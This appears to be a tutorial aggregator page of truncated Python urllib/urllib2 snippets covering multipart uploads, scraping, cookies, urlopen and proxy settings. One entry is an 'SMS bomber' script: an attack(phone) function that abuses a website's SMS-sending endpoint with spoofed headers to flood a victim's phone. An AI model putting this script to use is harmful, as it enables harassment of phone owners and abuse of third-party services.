urllib2 | 易学教程

Multipart form encoding and posting with urllib3


Question: I'm attempting to upload a CSV file to this site. However, I've run into a few issues, and I think they stem from an incorrect MIME type (maybe). I'm attempting to post the file manually via urllib2, so my code looks as follows:

    import urllib
    import urllib2
    import mimetools, mimetypes
    import os, stat
    from cStringIO import StringIO

    #============================
    # Note: I found this recipe online. I can't remember where exactly though..
    #=============================
    class Callable:
        def _
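For readers on Python 3, where urllib2 no longer exists, the general shape of a hand-built multipart/form-data body can be sketched as follows. This is a minimal illustration, not the recipe the question refers to: the function name `encode_multipart` and its argument layout are assumptions made for this example.

```python
import mimetypes
import uuid


def encode_multipart(fields, files):
    """Build a multipart/form-data body (hypothetical helper for illustration).

    fields: dict mapping form field name -> text value
    files:  dict mapping form field name -> (filename, content as bytes)
    Returns (content_type_header_value, body_bytes).
    """
    boundary = uuid.uuid4().hex
    delimiter = ("--" + boundary).encode("ascii")
    parts = []
    # Plain text fields: one part each, with only a Content-Disposition header.
    for name, value in fields.items():
        parts += [
            delimiter,
            f'Content-Disposition: form-data; name="{name}"'.encode("utf-8"),
            b"",
            str(value).encode("utf-8"),
        ]
    # File fields: add a filename and a Content-Type guessed from the extension.
    for name, (filename, content) in files.items():
        mimetype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
        parts += [
            delimiter,
            f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode("utf-8"),
            f"Content-Type: {mimetype}".encode("ascii"),
            b"",
            content,
        ]
    # The closing delimiter carries two trailing dashes.
    parts += [delimiter + b"--", b""]
    return "multipart/form-data; boundary=" + boundary, b"\r\n".join(parts)
```

To send the result, one would pass the body as `data` to `urllib.request.Request` and set the returned value as the `Content-Type` header. Whether the target site accepts the guessed MIME type for a CSV file depends on the server.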

Python 3 urllib Vs requests performance


Question: I'm using Python 3.5 and comparing the performance of the urllib module vs. the requests module. I wrote two clients in Python: the first uses the urllib module and the second uses the requests module. Both generate binary data and send it to a Flask-based server, and the Flask server also returns binary data to the client. I found that sending the data from the client to the server took the same time for both modules (urllib, requests), but the time

counting words inside a webpage


Question: I need to count the words in a web page using Python 3. Which module should I use? urllib? Here is my code:

    def web():
        f =("urllib.request.urlopen("https://americancivilwar.com/north/lincoln.html")
        lu = f.read()
        print(lu)

Answer 1: The self-explanatory code below is a good starting point for counting words in a web page:

    import requests
    from bs4 import BeautifulSoup
    from collections import Counter
    from string import punctuation

    # We get the url
    r = requests.get("https://en
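As a standard-library alternative to the requests and BeautifulSoup approach the answer starts with, word counting over an HTML string can be sketched as below. This is not the answer's code: the names `TextExtractor` and `count_words` are made up for this example, and the definition of a "word" (runs of ASCII letters, digits, and apostrophes) is an assumption.

```python
import re
from collections import Counter
from html.parser import HTMLParser


class TextExtractor(HTMLParser):
    """Collect text nodes, skipping the contents of <script> and <style>."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def count_words(html):
    """Return a Counter of lowercase words found in the page text."""
    parser = TextExtractor()
    parser.feed(html)
    parser.close()
    text = " ".join(parser.chunks).lower()
    # Assumption: a word is a run of ASCII letters, digits, or apostrophes.
    return Counter(re.findall(r"[a-z0-9']+", text))
```

The HTML string itself could come from `urllib.request.urlopen(url).read().decode(...)`, which answers the "urllib?" part of the question; `count_words(html).most_common(10)` would then list the ten most frequent words.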

Simulating a browser to scrape web pages in Python (1)


When scraping web pages, we usually reach for urllib directly (this walkthrough is based on Python 2.7; in Python 3, urllib and urllib2 were merged into urllib). Some sites, however, enable anti-scraping measures and reject crawlers. In that case you can simulate a browser when requesting the page and then extract the data you need. Here is a simple request:

    import urllib
    url="http://www.csdn.net/"
    html=urllib.urlopen(url)
    print html.read()

This program fetches the CSDN home page and prints its source. Now consider the following example:

    import urllib
    url="http://blog.csdn.net/beliefer/article/details/51251757"
    html=urllib.urlopen(url)
    print html.read()

Here the URL has been changed to a blog post on CSDN, and the result is:

    <html> <head><title>403 Forbidden</title></head> <body bgcolor="white"> <center><h1>403 Forbidden</h1></center> <hr><center>nginx<
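The usual way to "simulate a browser" is to send browser-like request headers, most importantly User-Agent. A minimal Python 3 sketch follows; the helper name `build_browser_request` and the exact User-Agent string are assumptions for illustration, and nothing here guarantees that a particular site will stop returning 403.

```python
import urllib.request

# Assumption: any realistic browser User-Agent string would do here.
BROWSER_HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
}


def build_browser_request(url, extra_headers=None):
    """Return a urllib.request.Request carrying browser-like headers."""
    headers = dict(BROWSER_HEADERS)
    headers.update(extra_headers or {})
    return urllib.request.Request(url, headers=headers)
```

The request object would then be passed to `urllib.request.urlopen(request)` in place of the bare URL. In Python 2.7 the equivalent classes are `urllib2.Request` and `urllib2.urlopen`.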

Logging in to Renren with cookies to scrape data


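How a browser talks to a web server: when a user visits a page, whether by typing a domain name or IP address as the URL or by clicking a link, the browser sends an HTTP request to the web server. The server receives the request and sends back an HTTP response. The browser's parsing and layout engines then process the returned content and render it for the user. Throughout this exchange between a web application and the server, HTTP requests and responses are both sent as structured messages.

What is a cookie? Cookies travel in the headers of HTTP requests and responses, and they are an important header field. When a user first visits a domain through the browser, the web server sends data to the client so that state can be maintained between server and client. That data is the cookie: data created by an Internet site and stored on the user's local device in order to identify the user. The information in a cookie is usually encrypted. Cookies are kept in a cache or on disk; those on disk are small text files. When you visit the site again, the cookie for that site is read. Cookies effectively improve the browsing experience. In general, once a cookie is saved on a computer, only the site that created it can read it.

Why are cookies needed? HTTP is a stateless, connection-oriented protocol that is layered on top of TCP/IP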
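To make the header mechanics concrete: the server sets cookies with Set-Cookie response headers, and the client echoes the name/value pairs back in a single Cookie request header. The sketch below uses Python 3's `http.cookies.SimpleCookie`; the helper name `cookie_header_from_set_cookie` and the sample cookie values are invented for illustration, and the sketch deliberately ignores domain, path, and expiry matching.

```python
from http.cookies import SimpleCookie


def cookie_header_from_set_cookie(set_cookie_values):
    """Turn Set-Cookie header values into the value of a Cookie request header.

    Simplification: attributes such as Path, Domain, and Max-Age are parsed
    but not enforced, so this is only suitable for illustration.
    """
    jar = SimpleCookie()
    for value in set_cookie_values:
        jar.load(value)
    return "; ".join(f"{name}={morsel.value}" for name, morsel in jar.items())
```

For real scraping sessions, `http.cookiejar.CookieJar` combined with `urllib.request.HTTPCookieProcessor` stores and resends cookies automatically, including the matching rules skipped here.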

Basic usage of the urllib2 library for crawlers


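Web scraping means reading the network resource identified by a URL out of the network stream and saving it locally. Python has many libraries for fetching web pages; this post covers basic usage of urllib2. urllib2 is a module bundled with Python 2.7 (no download needed, just import it). urllib2 official documentation: https://docs.python.org/2/library/urllib2.html urllib2 source: https://hg.python.org/cpython/file/2.7/Lib/urllib2.py In Python 3.x, urllib2 was renamed to urllib.request.

urlopen

    #coding=utf-8
    # Import the urllib2 library
    import urllib2
    # Send a request to the given URL and get back a file-like object for the server's response
    response = urllib2.urlopen("http://www.cnblogs.com/loaderman/")
    # The file-like object supports file methods, e.g. read() reads the whole content and returns a string
    html = response.read()
    # Print the string
    print html

Run the code and it prints the result. In fact, if you right-click the page in a browser and choose "View Source", you will find it is identical to what was printed. In other words, the four lines of code above have already pulled down the page's entire source.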
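Since the text notes that urllib2 became urllib.request in Python 3, a rough Python 3 counterpart of the snippet above might look like this. The helper name `fetch_text`, the 10-second timeout, and the UTF-8 fallback are assumptions for this sketch; unlike Python 2, `read()` returns bytes, so the result has to be decoded.

```python
import urllib.request


def fetch_text(url, timeout=10, default_charset="utf-8"):
    """Fetch a URL and return its body decoded to str."""
    with urllib.request.urlopen(url, timeout=timeout) as response:
        raw = response.read()  # bytes in Python 3
        # Use the charset from the Content-Type header when the server sends one.
        charset = response.headers.get_content_charset() or default_charset
    return raw.decode(charset, errors="replace")
```

Calling `print(fetch_text("http://www.cnblogs.com/loaderman/"))` would correspond to the Python 2 example, assuming the site is reachable.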

Python crawlers (2): using urllib2


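Web scraping means reading the network resource identified by a URL out of the network stream and saving it locally. Python has many libraries for fetching web pages; we start with urllib2. urllib2 is a module bundled with Python 2.x (no download needed, just import it). urllib2 official documentation: https://docs.python.org/2/library/urllib2.html urllib2 source. In Python 3.x, urllib2 was renamed to urllib.request.

urlopen

Let's start with some code:

    #-*- coding:utf-8 -*-
    #01.urllib2_urlopen.py
    # Import the urllib2 library
    import urllib2
    # Send a request to the given URL and get back a file-like object from the server
    response = urllib2.urlopen("http://www.baidu.com")
    # The file-like object supports file methods, e.g. read() reads the content
    html = response.read()
    # Print the string
    print(html)

Run the finished code and it prints the result:

    python2 01.urllib2_urlopen.py

In fact, if we open the Baidu home page in a browser, right-click, and choose "View Source", we find it is identical to what was just printed. In other words, the four lines of code above have already pulled down the entire source of the Baidu home page.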

SMS bomber (smsbomb) in Python, part 2 (GET)


The previous post covered sending data via POST, but some sites send data via GET, for example http://www.oupeng.com/download. The approach is in fact much the same. import httplib,urllib,sys,os,re,urllib2 import string def attack(phone): datas="" url='http://www.oupeng.com/sms/sendsms.php?os=s60&mobile=%s' % phone i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5", "Accept": "text/plain",'Referer':'http://www.oupeng.com/download'} #payload=urllib.urlencode(payload) try: request=urllib2.Request(url=url,headers=i_headers) response=urllib2.urlopen(request) datas=response.read() print datas print 'attack success!!!'

Web scraping in Python: urllib, urllib2, httplib


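A while ago I needed FTP and wrote a utility script: http://blog.csdn.net/wklken/article/details/7059423 Recently I needed to scrape web pages, so I looked at the ways to do it in Python.

Requirement: fetch web pages and parse out the content.
Libraries involved (focus on urllib2):
urllib http://docs.python.org/library/urllib.html
urllib2 http://docs.python.org/library/urllib2.html
httplib http://docs.python.org/library/httplib.html

Using urllib:
1. Fetching page information
urllib.urlopen(url[, data[, proxies]]):
url: the path to the remote data
data: data submitted to the URL via POST
proxies: used to configure proxies
The object returned by urlopen provides these methods:
- read(), readline(), readlines(), fileno(), close(): used exactly like the same methods on file objects
- info(): returns an httplib.HTTPMessage object representing the headers returned by the remote server
- getcode(): returns the HTTP status code. For an HTTP request, 200 means the request completed successfully; 404 means the URL was not found
- geturl()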
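The response methods listed above still exist on the object returned by Python 3's `urllib.request.urlopen`, so they can be sketched together as below. The helper name `describe_response` and the returned dictionary layout are assumptions for illustration; newer Python 3 code tends to read the `status`, `url`, and `headers` attributes instead of calling `getcode()`, `geturl()`, and `info()`.

```python
import urllib.request


def describe_response(url, timeout=10):
    """Open a URL and collect what the response object reports about itself."""
    with urllib.request.urlopen(url, timeout=timeout) as response:
        return {
            "url": response.geturl(),          # URL actually retrieved
            "status": response.getcode(),      # HTTP status code for http(s) URLs
            "content_type": response.info().get_content_type(),
            "first_line": response.readline(), # file-like access, returns bytes
        }
```

For an http or https URL, `status` would be an integer such as 200. A 404 is not returned this way in Python 3, because `urlopen` raises `urllib.error.HTTPError` for it.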

urllib2 usage details (repost)


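The Python standard library has many useful utility classes, but the standard library documentation is often unclear about the details of using them; urllib2, the HTTP client library, is one example. This post summarizes some usage details of urllib2.

1 Proxy settings
2 Timeout settings
3 Adding a specific header to an HTTP request
4 Redirect
5 Cookie
6 Using the HTTP PUT and DELETE methods
7 Getting the HTTP status code
8 Debug log

1 Proxy settings

By default, urllib2 uses the http_proxy environment variable to set the HTTP proxy. If you want to control the proxy explicitly in your program, independent of the environment variable, you can do the following:

    import urllib2
    enable_proxy = True
    proxy_handler = urllib2.ProxyHandler({"http" : 'http://some-proxy.com:8080'})
    null_proxy_handler = urllib2.ProxyHandler({})
    if enable_proxy:
        opener = urllib2.build_opener(proxy_handler)
    else:
        opener = urllib2.build_opener(null_proxy_handler)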
